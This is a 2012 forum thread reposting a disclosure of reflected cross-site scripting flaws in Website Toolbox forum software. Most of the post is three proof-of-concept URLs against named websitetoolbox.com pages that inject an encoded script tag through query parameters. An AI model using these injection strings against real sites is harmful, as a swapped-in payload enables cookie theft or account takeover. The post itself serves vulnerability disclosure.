Новости из Блогов Website Toolbox Cross Site Scripting

Discussion in 'Мировые новости. Обсуждения.' started by Suicide, 7 Apr 2012.

Thread Status:
Not open for further replies.
  1. Suicide

    Suicide Super Moderator
    Staff Member

    Joined:
    24 Apr 2009
    Messages:
    2,373
    Likes Received:
    6,619
    Reputations:
    693
    Website Toolbox Cross Site Scripting


    # Exploit Title: Website Toolbox Cross Site Scripting
    # Date: 7.04.2012
    # Author: Sony
    # Software Link: http://websitetoolbox.com
    # Web Browser : Mozilla Firefox
    # Site : http://insecurity.ro
    # PoC: http://st2tea.blogspot.com/2012/04/website-toolbox-cross-site-scripting.html



    Website Toolbox..my favorive forum software.


    Pretty Forum!


    About: Video


    Well, but we have a multiple cross site scripting vulnerabilities.


    Simple examples:
    Code:
    http://greentea.websitetoolbox.com/register?s_username=&s_email=&s_im=%22%22%3E%3Cscript%3Ealert%28%22hello%22%29%3C%2Fscript%3E&s_regafter_month=&s_regafter_day=&s_regafter_year=&s_regbefore_month=&s_regbefore_day=&s_regbefore_year=&last_post_date_after_month=&last_post_date_after_day=&last_post_date_after_year=&last_post_date_before_month=&last_post_date_before_day=&last_post_date_before_year=&lastvisit_month_after=&lastvisit_day_after=&lastvisit_year_after=&lastvisit_month_before=&lastvisit_day_before=&lastvisit_year_before=&s_postsgreater=&s_postsless=&field240875=&field240876=&field240877=&field240878=&birthday_after_month=&birthday_after_day=&birthday_after_year=&birthday_before_month=&birthday_before_day=&birthday_before_year=&ip_address=&usergroupid=&Submit=Search&fieldid_fields=240875%2C240876%2C240877%2C240878%2C&action=members&search=true
    [​IMG]


    Code:
    http://www.websitetoolbox.com/cgi/members/mb_admins.cgi?action=moderatorlogs&type=calendar_logs%22%22%3E%3Cscript%3Ealert%28%22hello%22%29%3C/script%3E
    [​IMG]


    Code:
    http://greentea.websitetoolbox.com/register/register?edit=1&userid=1885232%22%22%3E%3Cscript%3Ealert%28%22hello%22%29%3C/script%3E
    [​IMG]

    etc..


    Don't Panic! It's only cross site scripting.


    Запись от 6.04.2012
    http://st2tea.blogspot.com/
    http://st2tea.blogspot.com/2012/04/website-toolbox-cross-site-scripting.html
     
Thread Status:
Not open for further replies.